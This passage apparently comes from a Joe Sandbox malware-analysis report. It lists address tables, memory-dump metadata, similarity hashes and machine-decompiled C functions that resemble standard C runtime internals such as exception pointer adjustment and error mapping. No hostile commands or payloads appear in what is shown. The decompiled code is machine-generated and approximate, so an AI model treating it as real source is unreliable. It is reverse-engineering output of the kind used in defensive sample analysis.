                                                0x00c23c28
                                                0x00c23c2b
                                                0x00c23c2e
                                                0x00c23c30
                                                0x00c23c32
                                                0x00c23c32
                                                0x00c23c3f
                                                0x00c23c46
                                                0x00c23c4d
                                                0x00c23c4f
                                                0x00c23c58
                                                0x00c23c58
                                                0x00c23c5b
                                                0x00c23c5d
                                                0x00c23c60
                                                0x00c23c63
                                                0x00c23c6f
                                                0x00c23c6f
                                                0x00c23c73
                                                0x00c23c76
                                                0x00c23c78
                                                0x00000000
                                                0x00c23c65
                                                0x00c23c65
                                                0x00c23c6b
                                                0x00c23c6b
                                                0x00c23c79
                                                0x00c23c79
                                                0x00c23c7c
                                                0x00c23c80
                                                0x00c23c81
                                                0x00c23c83
                                                0x00c23c85
                                                0x00c23c87
                                                0x00c23cb1
                                                0x00c23cb1
                                                0x00c23cb3
                                                0x00c23cc0
                                                0x00c23cc0
                                                0x00c23cc1
                                                0x00c23cc2
                                                0x00c23cc4
                                                0x00c23cc6
                                                0x00c23ccb
                                                0x00c23ccd
                                                0x00c23cd1
                                                0x00c23cd4
                                                0x00c23cd7
                                                0x00c23cd9
                                                0x00c23cda
                                                0x00c23cda
                                                0x00c23cdc
                                                0x00c23cdc
                                                0x00c23cde
                                                0x00c23ceb
                                                0x00c23ceb
                                                0x00c23cec
                                                0x00c23ced
                                                0x00c23cef
                                                0x00c23cf0
                                                0x00c23cf1
                                                0x00c23cfa
                                                0x00c23cfd
                                                0x00c23cff
                                                0x00c23d00
                                                0x00c23d00
                                                0x00c23d02
                                                0x00c23d02
                                                0x00c23d02
                                                0x00c23d05
                                                0x00c23d07
                                                0x00c23d0a
                                                0x00c23d0c
                                                0x00c23d12
                                                0x00c23d17
                                                0x00c23d17
                                                0x00c23d22
                                                0x00c23d22
                                                0x00c23ce0
                                                0x00c23ce2
                                                0x00000000
                                                0x00000000
                                                0x00c23ce4
                                                0x00000000
                                                0x00000000
                                                0x00c23ce6
                                                0x00c23ce9
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00c23ce9
                                                0x00c23cb5
                                                0x00c23cb7
                                                0x00000000
                                                0x00000000
                                                0x00c23cb9
                                                0x00000000
                                                0x00000000
                                                0x00c23cbb
                                                0x00c23cbe
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00c23cbe
                                                0x00c23c89
                                                0x00c23c8e
                                                0x00c23c94
                                                0x00c23c94
                                                0x00c23c95
                                                0x00c23c96
                                                0x00c23c97
                                                0x00c23c99
                                                0x00c23c9e
                                                0x00c23ca0
                                                0x00c23ca2
                                                0x00c23ca7
                                                0x00c23caa
                                                0x00c23cac
                                                0x00c23caf
                                                0x00c23caf
                                                0x00000000
                                                0x00c23caf
                                                0x00c23c90
                                                0x00c23c92
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00c23c92
                                                0x00c23c67
                                                0x00c23c69
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00c23c69
                                                0x00c23c63
                                                0x00000000
                                                0x00c23b54
                                                0x00c23b50
                                                0x00c23b05
                                                0x00c23b11
                                                0x00c23b11
                                                0x00c23b13
                                                0x00c23b1a
                                                0x00000000
                                                0x00c23b1a
                                                0x00c23b15
                                                0x00000000
                                                0x00c23b15
                                                0x00c23ac8
                                                0x00c23ace
                                                0x00c23ace
                                                0x00c23ad1
                                                0x00c23ad1
                                                0x00c23ad2
                                                0x00000000
                                                0x00c23ad2
                                                0x00c23aca
                                                0x00c23acc
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00c23acc
                                                0x00c23a8a
                                                0x00c23a8f
                                                0x00c23a91
                                                0x00c23a9e
                                                0x00c23aa5
                                                0x00c23aa7
                                                0x00c23ab2
                                                0x00c23ab2
                                                0x00c23ab5
                                                0x00c23ab7
                                                0x00c23ab7
                                                0x00c23abb
                                                0x00c23a93
                                                0x00c23a93
                                                0x00c23a93
                                                0x00000000
                                                0x00c23a91
                                                0x00c23a42
                                                0x00c23a49
                                                0x00c23a4a
                                                0x00c23a4c
                                                0x00000000

                                                APIs
                                                Memory Dump Source
                                                • Source File: 0000000C.00000002.443436477.0000000000C11000.00000020.00000001.01000000.00000009.sdmp, Offset: 00C10000, based on PE: true
                                                • Associated: 0000000C.00000002.443279176.0000000000C10000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                • Associated: 0000000C.00000002.443765227.0000000000C34000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                • Associated: 0000000C.00000002.443923174.0000000000C42000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                • Associated: 0000000C.00000002.444652620.0000000000C97000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                • Associated: 0000000C.00000002.444675545.0000000000C98000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                • Associated: 0000000C.00000002.444742097.0000000000C9A000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_12_2_c10000_8F68.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: _strrchr
                                                • String ID:
                                                • API String ID: 3213747228-0
                                                • Opcode ID: 45dc78e5efba6b49ef3f20cfc9e7711e5cf6c5418e5b76b9c849d4f08f06aa30
                                                • Instruction ID: 21ff87c84a9b9e70e41a822e6c5e660fd615d14cbbc712484875785c7d25d740
                                                • Opcode Fuzzy Hash: 45dc78e5efba6b49ef3f20cfc9e7711e5cf6c5418e5b76b9c849d4f08f06aa30
                                                • Instruction Fuzzy Hash: 37B12631A042E59FDB11CF28D8817EEBBE5EF55310F244169E855AB742D63C8F42DB60
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 64%
                                                			E00C1A6E1(void* __ebx, void* __edi, void* __esi, void* __eflags) {
                                                				signed int* _t52;
                                                				signed int _t53;
                                                				intOrPtr _t54;
                                                				signed int _t58;
                                                				signed int _t61;
                                                				intOrPtr _t71;
                                                				signed int _t75;
                                                				signed int _t79;
                                                				signed int _t81;
                                                				signed int _t84;
                                                				signed int _t85;
                                                				signed int _t97;
                                                				signed int* _t98;
                                                				signed char* _t101;
                                                				signed int _t107;
                                                				void* _t111;
                                                
                                                				_push(0x10);
                                                				_push(0xc40ad8);
                                                				E00C17D30(__ebx, __edi, __esi);
                                                				_t75 = 0;
                                                				_t52 =  *(_t111 + 0x10);
                                                				_t81 = _t52[1];
                                                				if(_t81 == 0 ||  *((intOrPtr*)(_t81 + 8)) == 0) {
                                                					L30:
                                                					_t53 = 0;
                                                					__eflags = 0;
                                                					goto L31;
                                                				} else {
                                                					_t97 = _t52[2];
                                                					if(_t97 != 0 ||  *_t52 < 0) {
                                                						_t84 =  *_t52;
                                                						_t107 =  *(_t111 + 0xc);
                                                						if(_t84 >= 0) {
                                                							_t107 = _t107 + 0xc + _t97;
                                                						}
                                                						 *(_t111 - 4) = _t75;
                                                						_t101 =  *(_t111 + 0x14);
                                                						if(_t84 >= 0 || ( *_t101 & 0x00000010) == 0) {
                                                							L10:
                                                							_t54 =  *((intOrPtr*)(_t111 + 8));
                                                							__eflags = _t84 & 0x00000008;
                                                							if((_t84 & 0x00000008) == 0) {
                                                								__eflags =  *_t101 & 0x00000001;
                                                								if(( *_t101 & 0x00000001) == 0) {
                                                									_t84 =  *(_t54 + 0x18);
                                                									__eflags = _t101[0x18] - _t75;
                                                									if(_t101[0x18] != _t75) {
                                                										__eflags = _t84;
                                                										if(_t84 == 0) {
                                                											goto L32;
                                                										} else {
                                                											__eflags = _t107;
                                                											if(_t107 == 0) {
                                                												goto L32;
                                                											} else {
                                                												__eflags =  *_t101 & 0x00000004;
                                                												_t79 = 0;
                                                												_t75 = (_t79 & 0xffffff00 | ( *_t101 & 0x00000004) != 0x00000000) + 1;
                                                												__eflags = _t75;
                                                												 *(_t111 - 0x20) = _t75;
                                                												goto L29;
                                                											}
                                                										}
                                                									} else {
                                                										__eflags = _t84;
                                                										if(_t84 == 0) {
                                                											goto L32;
                                                										} else {
                                                											__eflags = _t107;
                                                											if(_t107 == 0) {
                                                												goto L32;
                                                											} else {
                                                												E00C18460(_t107, E00C18B14(_t84,  &(_t101[8])), _t101[0x14]);
                                                												goto L29;
                                                											}
                                                										}
                                                									}
                                                								} else {
                                                									__eflags =  *(_t54 + 0x18);
                                                									if( *(_t54 + 0x18) == 0) {
                                                										goto L32;
                                                									} else {
                                                										__eflags = _t107;
                                                										if(_t107 == 0) {
                                                											goto L32;
                                                										} else {
                                                											E00C18460(_t107,  *(_t54 + 0x18), _t101[0x14]);
                                                											__eflags = _t101[0x14] - 4;
                                                											if(_t101[0x14] == 4) {
                                                												__eflags =  *_t107;
                                                												if( *_t107 != 0) {
                                                													_push( &(_t101[8]));
                                                													_push( *_t107);
                                                													goto L21;
                                                												}
                                                											}
                                                											goto L29;
                                                										}
                                                									}
                                                								}
                                                							} else {
                                                								_t84 =  *(_t54 + 0x18);
                                                								goto L12;
                                                							}
                                                						} else {
                                                							_t71 =  *0xc990ac; // 0x0
                                                							 *((intOrPtr*)(_t111 - 0x1c)) = _t71;
                                                							if(_t71 == 0) {
                                                								goto L10;
                                                							} else {
                                                								 *0xc34138();
                                                								_t84 =  *((intOrPtr*)(_t111 - 0x1c))();
                                                								L12:
                                                								if(_t84 == 0 || _t107 == 0) {
                                                									L32:
                                                									E00C200C9(_t75, _t84, _t97, _t101, _t107);
                                                									asm("int3");
                                                									_push(8);
                                                									_push(0xc40af8);
                                                									E00C17D30(_t75, _t101, _t107);
                                                									_t98 =  *(_t111 + 0x10);
                                                									_t85 =  *(_t111 + 0xc);
                                                									__eflags =  *_t98;
                                                									if(__eflags >= 0) {
                                                										_t103 = _t85 + 0xc + _t98[2];
                                                										__eflags = _t85 + 0xc + _t98[2];
                                                									} else {
                                                										_t103 = _t85;
                                                									}
                                                									 *(_t111 - 4) =  *(_t111 - 4) & 0x00000000;
                                                									_t108 =  *(_t111 + 0x14);
                                                									_push( *(_t111 + 0x14));
                                                									_push(_t98);
                                                									_push(_t85);
                                                									_t77 =  *((intOrPtr*)(_t111 + 8));
                                                									_push( *((intOrPtr*)(_t111 + 8)));
                                                									_t58 = E00C1A6E1(_t77, _t103, _t108, __eflags) - 1;
                                                									__eflags = _t58;
                                                									if(_t58 == 0) {
                                                										_t61 = E00C1B3E7(_t103, _t108[0x18], E00C18B14( *((intOrPtr*)(_t77 + 0x18)),  &(_t108[8])));
                                                									} else {
                                                										_t61 = _t58 - 1;
                                                										__eflags = _t61;
                                                										if(_t61 == 0) {
                                                											_t61 = E00C1B3F7(_t103, _t108[0x18], E00C18B14( *((intOrPtr*)(_t77 + 0x18)),  &(_t108[8])), 1);
                                                										}
                                                									}
                                                									 *(_t111 - 4) = 0xfffffffe;
                                                									 *[fs:0x0] =  *((intOrPtr*)(_t111 - 0x10));
                                                									return _t61;
                                                								} else {
                                                									 *_t107 = _t84;
                                                									_push( &(_t101[8]));
                                                									_push(_t84);
                                                									L21:
                                                									 *_t107 = E00C18B14();
                                                									L29:
                                                									 *(_t111 - 4) = 0xfffffffe;
                                                									_t53 = _t75;
                                                									L31:
                                                									 *[fs:0x0] =  *((intOrPtr*)(_t111 - 0x10));
                                                									return _t53;
                                                								}
                                                							}
                                                						}
                                                					} else {
                                                						goto L30;
                                                					}
                                                				}
                                                			}



















                                                0x00c1a6e1
                                                0x00c1a6e3
                                                0x00c1a6e8
                                                0x00c1a6ed
                                                0x00c1a6ef
                                                0x00c1a6f2
                                                0x00c1a6f7
                                                0x00c1a807
                                                0x00c1a807
                                                0x00c1a807
                                                0x00000000
                                                0x00c1a706
                                                0x00c1a706
                                                0x00c1a70b
                                                0x00c1a715
                                                0x00c1a717
                                                0x00c1a71c
                                                0x00c1a721
                                                0x00c1a721
                                                0x00c1a723
                                                0x00c1a726
                                                0x00c1a72b
                                                0x00c1a74d
                                                0x00c1a74d
                                                0x00c1a750
                                                0x00c1a753
                                                0x00c1a771
                                                0x00c1a774
                                                0x00c1a7b3
                                                0x00c1a7b6
                                                0x00c1a7b9
                                                0x00c1a7de
                                                0x00c1a7e0
                                                0x00000000
                                                0x00c1a7e2
                                                0x00c1a7e2
                                                0x00c1a7e4
                                                0x00000000
                                                0x00c1a7e6
                                                0x00c1a7e6
                                                0x00c1a7eb
                                                0x00c1a7ef
                                                0x00c1a7ef
                                                0x00c1a7f0
                                                0x00000000
                                                0x00c1a7f0
                                                0x00c1a7e4
                                                0x00c1a7bb
                                                0x00c1a7bb
                                                0x00c1a7bd
                                                0x00000000
                                                0x00c1a7bf
                                                0x00c1a7bf
                                                0x00c1a7c1
                                                0x00000000
                                                0x00c1a7c3
                                                0x00c1a7d4
                                                0x00000000
                                                0x00c1a7d9
                                                0x00c1a7c1
                                                0x00c1a7bd
                                                0x00c1a776
                                                0x00c1a776
                                                0x00c1a77a
                                                0x00000000
                                                0x00c1a780
                                                0x00c1a780
                                                0x00c1a782
                                                0x00000000
                                                0x00c1a788
                                                0x00c1a78f
                                                0x00c1a797
                                                0x00c1a79b
                                                0x00c1a79d
                                                0x00c1a7a0
                                                0x00c1a7a5
                                                0x00c1a7a6
                                                0x00000000
                                                0x00c1a7a6
                                                0x00c1a7a0
                                                0x00000000
                                                0x00c1a79b
                                                0x00c1a782
                                                0x00c1a77a
                                                0x00c1a755
                                                0x00c1a755
                                                0x00000000
                                                0x00c1a755
                                                0x00c1a732
                                                0x00c1a732
                                                0x00c1a737
                                                0x00c1a73c
                                                0x00000000
                                                0x00c1a73e
                                                0x00c1a740
                                                0x00c1a749
                                                0x00c1a758
                                                0x00c1a75a
                                                0x00c1a819
                                                0x00c1a819
                                                0x00c1a81e
                                                0x00c1a81f
                                                0x00c1a821
                                                0x00c1a826
                                                0x00c1a82b
                                                0x00c1a82e
                                                0x00c1a831
                                                0x00c1a834
                                                0x00c1a83d
                                                0x00c1a83d
                                                0x00c1a836
                                                0x00c1a836
                                                0x00c1a836
                                                0x00c1a840
                                                0x00c1a844
                                                0x00c1a847
                                                0x00c1a848
                                                0x00c1a849
                                                0x00c1a84a
                                                0x00c1a84d
                                                0x00c1a856
                                                0x00c1a856
                                                0x00c1a859
                                                0x00c1a88f
                                                0x00c1a85b
                                                0x00c1a85b
                                                0x00c1a85b
                                                0x00c1a85e
                                                0x00c1a875
                                                0x00c1a875
                                                0x00c1a85e
                                                0x00c1a894
                                                0x00c1a89e
                                                0x00c1a8aa
                                                0x00c1a768
                                                0x00c1a768
                                                0x00c1a76d
                                                0x00c1a76e
                                                0x00c1a7a8
                                                0x00c1a7af
                                                0x00c1a7f3
                                                0x00c1a7f3
                                                0x00c1a7fa
                                                0x00c1a809
                                                0x00c1a80c
                                                0x00c1a818
                                                0x00c1a818
                                                0x00c1a75a
                                                0x00c1a73c
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00c1a70b

                                                APIs
                                                Memory Dump Source
                                                • Source File: 0000000C.00000002.443436477.0000000000C11000.00000020.00000001.01000000.00000009.sdmp, Offset: 00C10000, based on PE: true
                                                • Associated: 0000000C.00000002.443279176.0000000000C10000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                • Associated: 0000000C.00000002.443765227.0000000000C34000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                • Associated: 0000000C.00000002.443923174.0000000000C42000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                • Associated: 0000000C.00000002.444652620.0000000000C97000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                • Associated: 0000000C.00000002.444675545.0000000000C98000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                • Associated: 0000000C.00000002.444742097.0000000000C9A000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_12_2_c10000_8F68.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: AdjustPointer
                                                • String ID:
                                                • API String ID: 1740715915-0
                                                • Opcode ID: f908bbb5a918017ecd6df5384fbb5eb59b862e7765d77fe5481d154316303129
                                                • Instruction ID: 393b07af4a57b4185022315807f844b2f78b1577475c426d18b0a1b8428e4715
                                                • Opcode Fuzzy Hash: f908bbb5a918017ecd6df5384fbb5eb59b862e7765d77fe5481d154316303129
                                                • Instruction Fuzzy Hash: 3051C1B16066069FEB299F15D841BFA73B4EF06314F244129E822971D1D731EEC2F792
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 100%
                                                			E00C29FC6(intOrPtr* _a4, intOrPtr _a8, intOrPtr _a16) {
                                                				intOrPtr _t16;
                                                				intOrPtr _t17;
                                                				intOrPtr _t19;
                                                				intOrPtr _t29;
                                                				char _t31;
                                                				intOrPtr _t38;
                                                				intOrPtr* _t40;
                                                				intOrPtr _t41;
                                                
                                                				_t40 = _a4;
                                                				if(_t40 != 0) {
                                                					_t31 = 0;
                                                					__eflags =  *_t40;
                                                					if( *_t40 != 0) {
                                                						_t16 = E00C29B81(_a16, 0, _t40, 0xffffffff, 0, 0, 0, 0);
                                                						__eflags = _t16;
                                                						if(__eflags != 0) {
                                                							_t38 = _a8;
                                                							__eflags = _t16 -  *((intOrPtr*)(_t38 + 0xc));
                                                							if(__eflags <= 0) {
                                                								L11:
                                                								_t17 = E00C29B81(_a16, _t31, _t40, 0xffffffff,  *((intOrPtr*)(_t38 + 8)),  *((intOrPtr*)(_t38 + 0xc)), _t31, _t31);
                                                								__eflags = _t17;
                                                								if(__eflags != 0) {
                                                									 *((intOrPtr*)(_t38 + 0x10)) = _t17 - 1;
                                                									_t19 = 0;
                                                									__eflags = 0;
                                                								} else {
                                                									E00C1D9F2(GetLastError());
                                                									_t19 =  *((intOrPtr*)(E00C1DA28(__eflags)));
                                                								}
                                                								L14:
                                                								return _t19;
                                                							}
                                                							_t19 = E00C2A58C(_t38, __eflags, _t16);
                                                							__eflags = _t19;
                                                							if(_t19 != 0) {
                                                								goto L14;
                                                							}
                                                							goto L11;
                                                						}
                                                						E00C1D9F2(GetLastError());
                                                						return  *((intOrPtr*)(E00C1DA28(__eflags)));
                                                					}
                                                					_t41 = _a8;
                                                					__eflags =  *((intOrPtr*)(_t41 + 0xc));
                                                					if(__eflags != 0) {
                                                						L6:
                                                						 *((char*)( *((intOrPtr*)(_t41 + 8)))) = _t31;
                                                						L2:
                                                						 *((intOrPtr*)(_t41 + 0x10)) = _t31;
                                                						return 0;
                                                					}
                                                					_t29 = E00C2A58C(_t41, __eflags, 1);
                                                					__eflags = _t29;
                                                					if(_t29 != 0) {
                                                						return _t29;
                                                					}
                                                					goto L6;
                                                				}
                                                				_t41 = _a8;
                                                				E00C204CA(_t41);
                                                				_t31 = 0;
                                                				 *((intOrPtr*)(_t41 + 8)) = 0;
                                                				 *((intOrPtr*)(_t41 + 0xc)) = 0;
                                                				goto L2;
                                                			}











                                                0x00c29fcd
                                                0x00c29fd2
                                                0x00c29ff0
                                                0x00c29ff2
                                                0x00c29ff5
                                                0x00c2a022
                                                0x00c2a02a
                                                0x00c2a02c
                                                0x00c2a045
                                                0x00c2a048
                                                0x00c2a04b
                                                0x00c2a059
                                                0x00c2a068
                                                0x00c2a070
                                                0x00c2a072
                                                0x00c2a08b
                                                0x00c2a08e
                                                0x00c2a08e
                                                0x00c2a074
                                                0x00c2a07b
                                                0x00c2a086
                                                0x00c2a086
                                                0x00c2a090
                                                0x00000000
                                                0x00c2a090
                                                0x00c2a050
                                                0x00c2a055
                                                0x00c2a057
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00c2a057
                                                0x00c2a035
                                                0x00000000
                                                0x00c2a040
                                                0x00c29ff7
                                                0x00c29ffa
                                                0x00c29ffd
                                                0x00c2a010
                                                0x00c2a013
                                                0x00c29fe6
                                                0x00c29fe6
                                                0x00000000
                                                0x00c29fe9
                                                0x00c2a003
                                                0x00c2a008
                                                0x00c2a00a
                                                0x00c2a094
                                                0x00c2a094
                                                0x00000000
                                                0x00c2a00a
                                                0x00c29fd4
                                                0x00c29fd9
                                                0x00c29fde
                                                0x00c29fe0
                                                0x00c29fe3
                                                0x00000000

                                                APIs
                                                  • Part of subcall function 00C204CA: _free.LIBCMT ref: 00C204D8
                                                  • Part of subcall function 00C29B81: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,?,0000FDE9,00000000,00000000,00000000,?,00C282DA,?,00000000,00000000), ref: 00C29C2D
                                                • GetLastError.KERNEL32 ref: 00C2A02E
                                                • __dosmaperr.LIBCMT ref: 00C2A035
                                                • GetLastError.KERNEL32(?,?,?,?,?,?,?), ref: 00C2A074
                                                • __dosmaperr.LIBCMT ref: 00C2A07B
                                                Memory Dump Source
                                                • Source File: 0000000C.00000002.443436477.0000000000C11000.00000020.00000001.01000000.00000009.sdmp, Offset: 00C10000, based on PE: true
                                                • Associated: 0000000C.00000002.443279176.0000000000C10000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                • Associated: 0000000C.00000002.443765227.0000000000C34000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                • Associated: 0000000C.00000002.443923174.0000000000C42000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                • Associated: 0000000C.00000002.444652620.0000000000C97000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                • Associated: 0000000C.00000002.444675545.0000000000C98000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                • Associated: 0000000C.00000002.444742097.0000000000C9A000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_12_2_c10000_8F68.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: ErrorLast__dosmaperr$ByteCharMultiWide_free
                                                • String ID:
                                                • API String ID: 167067550-0
                                                • Opcode ID: 474d1b679e9c4463096743185338aaa812d91f61ae398031332bae41ce4203b8
                                                • Instruction ID: 560fb35b561c1f5db7d7974367cb8086b80092a67900482e1ec7e05c9817d25f
                                                • Opcode Fuzzy Hash: 474d1b679e9c4463096743185338aaa812d91f61ae398031332bae41ce4203b8
                                                • Instruction Fuzzy Hash: B6210A71600225AF9B20AF76AC81EABB79CFF043647108515F92BD3941DB31ED40AB52
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 72%
                                                			E00C23663(void* __ecx, void* __edx) {
                                                				void* __ebx;
                                                				void* __edi;
                                                				void* __esi;
                                                				intOrPtr _t2;
                                                				long _t3;
                                                				intOrPtr _t5;
                                                				long _t6;
                                                				intOrPtr _t9;
                                                				long _t10;
                                                				signed int _t39;
                                                				signed int _t40;
                                                				void* _t43;
                                                				void* _t49;
                                                				signed int _t51;
                                                				signed int _t53;
                                                				signed int _t54;
                                                				long _t56;
                                                				long _t60;
                                                				long _t61;
                                                				void* _t65;
                                                
                                                				_t49 = __edx;
                                                				_t43 = __ecx;
                                                				_t60 = GetLastError();
                                                				_t2 =  *0xc42190; // 0x5
                                                				_t67 = _t2 - 0xffffffff;
                                                				if(_t2 == 0xffffffff) {
                                                					L6:
                                                					_t3 = E00C25721(__eflags, _t2, 0xffffffff);
                                                					__eflags = _t3;
                                                					if(_t3 == 0) {
                                                						goto L3;
                                                					} else {
                                                						_t51 = E00C22F42(1, 0x364);
                                                						_pop(_t43);
                                                						__eflags = _t51;
                                                						if(__eflags != 0) {
                                                							__eflags = E00C25721(__eflags,  *0xc42190, _t51);
                                                							if(__eflags != 0) {
                                                								E00C23491(_t51, 0xc99444);
                                                								E00C22F9F(0);
                                                								_t65 = _t65 + 0xc;
                                                								goto L13;
                                                							} else {
                                                								_t39 = 0;
                                                								E00C25721(__eflags,  *0xc42190, 0);
                                                								_push(_t51);
                                                								goto L9;
                                                							}
                                                						} else {
                                                							_t39 = 0;
                                                							__eflags = 0;
                                                							E00C25721(0,  *0xc42190, 0);
                                                							_push(0);
                                                							L9:
                                                							E00C22F9F();
                                                							_pop(_t43);
                                                							goto L4;
                                                						}
                                                					}
                                                				} else {
                                                					_t51 = E00C256E2(_t67, _t2);
                                                					if(_t51 == 0) {
                                                						_t2 =  *0xc42190; // 0x5
                                                						goto L6;
                                                					} else {
                                                						if(_t51 != 0xffffffff) {
                                                							L13:
                                                							_t39 = _t51;
                                                						} else {
                                                							L3:
                                                							_t39 = 0;
                                                							L4:
                                                							_t51 = _t39;
                                                						}
                                                					}
                                                				}
                                                				SetLastError(_t60);
                                                				asm("sbb edi, edi");
                                                				_t53 =  ~_t51 & _t39;
                                                				if(_t53 == 0) {
                                                					E00C200C9(_t39, _t43, _t49, _t53, _t60);
                                                					asm("int3");
                                                					_t5 =  *0xc42190; // 0x5
                                                					_push(_t60);
                                                					__eflags = _t5 - 0xffffffff;
                                                					if(__eflags == 0) {
                                                						L22:
                                                						_t6 = E00C25721(__eflags, _t5, 0xffffffff);
                                                						__eflags = _t6;
                                                						if(_t6 == 0) {
                                                							goto L31;
                                                						} else {
                                                							_t60 = E00C22F42(1, 0x364);
                                                							_pop(_t43);
                                                							__eflags = _t60;
                                                							if(__eflags != 0) {
                                                								__eflags = E00C25721(__eflags,  *0xc42190, _t60);
                                                								if(__eflags != 0) {
                                                									E00C23491(_t60, 0xc99444);
                                                									E00C22F9F(0);
                                                									_t65 = _t65 + 0xc;
                                                									goto L29;
                                                								} else {
                                                									E00C25721(__eflags,  *0xc42190, _t21);
                                                									_push(_t60);
                                                									goto L25;
                                                								}
                                                							} else {
                                                								E00C25721(__eflags,  *0xc42190, _t20);
                                                								_push(_t60);
                                                								L25:
                                                								E00C22F9F();
                                                								_pop(_t43);
                                                								goto L31;
                                                							}
                                                						}
                                                					} else {
                                                						_t60 = E00C256E2(__eflags, _t5);
                                                						__eflags = _t60;
                                                						if(__eflags == 0) {
                                                							_t5 =  *0xc42190; // 0x5
                                                							goto L22;
                                                						} else {
                                                							__eflags = _t60 - 0xffffffff;
                                                							if(_t60 == 0xffffffff) {
                                                								L31:
                                                								E00C200C9(_t39, _t43, _t49, _t53, _t60);
                                                								asm("int3");
                                                								_push(_t39);
                                                								_push(_t60);
                                                								_push(_t53);
                                                								_t61 = GetLastError();
                                                								_t9 =  *0xc42190; // 0x5
                                                								__eflags = _t9 - 0xffffffff;
                                                								if(__eflags == 0) {
                                                									L38:
                                                									_t10 = E00C25721(__eflags, _t9, 0xffffffff);
                                                									__eflags = _t10;
                                                									if(_t10 == 0) {
                                                										goto L35;
                                                									} else {
                                                										_t54 = E00C22F42(1, 0x364);
                                                										__eflags = _t54;
                                                										if(__eflags != 0) {
                                                											__eflags = E00C25721(__eflags,  *0xc42190, _t54);
                                                											if(__eflags != 0) {
                                                												E00C23491(_t54, 0xc99444);
                                                												E00C22F9F(0);
                                                												goto L45;
                                                											} else {
                                                												_t40 = 0;
                                                												E00C25721(__eflags,  *0xc42190, 0);
                                                												_push(_t54);
                                                												goto L41;
                                                											}
                                                										} else {
                                                											_t40 = 0;
                                                											__eflags = 0;
                                                											E00C25721(0,  *0xc42190, 0);
                                                											_push(0);
                                                											L41:
                                                											E00C22F9F();
                                                											goto L36;
                                                										}
                                                									}
                                                								} else {
                                                									_t54 = E00C256E2(__eflags, _t9);
                                                									__eflags = _t54;
                                                									if(__eflags == 0) {
                                                										_t9 =  *0xc42190; // 0x5
                                                										goto L38;
                                                									} else {
                                                										__eflags = _t54 - 0xffffffff;
                                                										if(_t54 != 0xffffffff) {
                                                											L45:
                                                											_t40 = _t54;
                                                										} else {
                                                											L35:
                                                											_t40 = 0;
                                                											__eflags = 0;
                                                											L36:
                                                											_t54 = _t40;
                                                										}
                                                									}
                                                								}
                                                								SetLastError(_t61);
                                                								asm("sbb edi, edi");
                                                								_t56 =  ~_t54 & _t40;
                                                								__eflags = _t56;
                                                								return _t56;
                                                							} else {
                                                								L29:
                                                								__eflags = _t60;
                                                								if(_t60 == 0) {
                                                									goto L31;
                                                								} else {
                                                									return _t60;
                                                								}
                                                							}
                                                						}
                                                					}
                                                				} else {
                                                					return _t53;
                                                				}
                                                			}























                                                0x00c23663
                                                0x00c23663
                                                0x00c2366e
                                                0x00c23670
                                                0x00c23675
                                                0x00c23678
                                                0x00c23696
                                                0x00c23699
                                                0x00c2369e
                                                0x00c236a0
                                                0x00000000
                                                0x00c236a2
                                                0x00c236ae
                                                0x00c236b1
                                                0x00c236b2
                                                0x00c236b4
                                                0x00c236d9
                                                0x00c236db
                                                0x00c236f4
                                                0x00c236fb
                                                0x00c23700
                                                0x00000000
                                                0x00c236dd
                                                0x00c236dd
                                                0x00c236e6
                                                0x00c236eb
                                                0x00000000
                                                0x00c236eb
                                                0x00c236b6
                                                0x00c236b6
                                                0x00c236b6
                                                0x00c236bf
                                                0x00c236c4
                                                0x00c236c5
                                                0x00c236c5
                                                0x00c236ca
                                                0x00000000
                                                0x00c236ca
                                                0x00c236b4
                                                0x00c2367a
                                                0x00c23680
                                                0x00c23684
                                                0x00c23691
                                                0x00000000
                                                0x00c23686
                                                0x00c23689
                                                0x00c23703
                                                0x00c23703
                                                0x00c2368b
                                                0x00c2368b
                                                0x00c2368b
                                                0x00c2368d
                                                0x00c2368d
                                                0x00c2368d
                                                0x00c23689
                                                0x00c23684
                                                0x00c23706
                                                0x00c2370e
                                                0x00c23710
                                                0x00c23712
                                                0x00c2371a
                                                0x00c2371f
                                                0x00c23720
                                                0x00c23725
                                                0x00c23726
                                                0x00c23729
                                                0x00c23743
                                                0x00c23746
                                                0x00c2374b
                                                0x00c2374d
                                                0x00000000
                                                0x00c2374f
                                                0x00c2375b
                                                0x00c2375e
                                                0x00c2375f
                                                0x00c23761
                                                0x00c23784
                                                0x00c23786
                                                0x00c2379d
                                                0x00c237a4
                                                0x00c237a9
                                                0x00000000
                                                0x00c23788
                                                0x00c2378f
                                                0x00c23794
                                                0x00000000
                                                0x00c23794
                                                0x00c23763
                                                0x00c2376a
                                                0x00c2376f
                                                0x00c23770
